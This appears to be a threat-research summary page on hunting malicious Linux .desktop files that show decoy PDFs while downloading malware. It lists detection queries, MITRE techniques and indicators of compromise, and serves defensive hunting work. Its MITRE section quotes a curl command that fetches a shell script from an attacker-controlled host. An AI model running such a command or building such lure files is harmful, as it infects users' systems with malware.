Threat Research

HuntingMaliciousDesktop_Files

GoogleCloudIntel
HuntingMaliciousDesktop_Files
EXTRACT IOC
Malicious threat actors have been abusing Linux .desktop files by embedding obfuscated junk code to execute commands that download malware, often disguising malicious PDF files hosted on Google Drive as distractions. This blog provides detailed hunting techniques and proactive detection queries for identifying such threats, focusing on behaviors in Linux desktop environments and related process executions. #GoogleThreatIntelligence #Linux #MalwareHunting

Keypoints

  • A new wave of malicious .desktop files has been observed leveraging obfuscation with junk code mixed into legitimate .desktop file structures to evade detection.
  • These malicious .desktop files typically open PDF files hosted on Google Drive using the system’s default application as a distraction while downloading malware in subsequent stages.
  • The files exploit Linux desktop environment utilities, such as xdg-open, exo-open, and exo-helper-2 (in XFCE), or gio open and kde-open (in GNOME and KDE), to open URLs automatically.
  • Effective threat hunting can focus on process arguments like –launch WebBrowser with Google Drive URLs and commands related to xdg-open process chains.
  • Queries targeting commands like grep -i ^xfcedesktopwindow and xprop -root, which help identify the XFCE environment during exploitation, are useful for detecting suspicious activity.
  • Content-based hunting using specific strings found in .desktop files, such as “Exec=bash -c “, “Name=”, “.pdf”, and the header “[Desktop Entry]”, can help identify malicious samples.
  • Generic hunting queries that detect .desktop files with thousands of leading “#” characters can uncover additional downloader or loader activity linked to malware campaigns.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – Threat actors utilize malicious .desktop files, which upon execution trigger legitimate system utilities to launch malicious payloads (‘…anonymous pdf file opened using xdg-open…’).
  • [T1105] Ingress Tool Transfer – The .desktop file downloads secondary malware stages from URLs hosted on Google Drive or attacker-controlled servers (‘…download a .sh file and execute it using curl -OL https://minio.daviduwu.ovh/public/check.sh’).
  • [T1059] Command and Scripting Interpreter – The Exec key runs bash commands embedded within the malicious .desktop file to execute scripts and commands (‘Exec=bash -c “…’).

Indicators of Compromise

  • [File Hash] Malicious .desktop files – c2f0f011eabb4fae94e7a5973f1f05208e197db983a09e2f7096bcff69a794d1, 8d61ce3651eb070c8cdb76a334a16e53ad865572, and 5 more hashes (samples uploaded in 2025).
  • [Domain/URL] Hosting malware payloads – https://drive.google.com/ and https://minio.daviduwu.ovh/public/check.sh (used for distributing PDF distractions and shell scripts).
  • [Filename] Malicious .desktop files – Opportunity for Exercise, Re Exercise of Option for pay Fixation.desktop, Revised SOP for Webex Meeting – MOD.desktop, and other filenames indicating social engineering tactics.

Read more: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-Google-Threat-Intelligence-I/ba-p/895333

Views: 35

Tags: TOOL, LINUX, EXPLOIT, HUNTING, SOCIAL ENGINEERING, PROXY, EMAIL, HUNT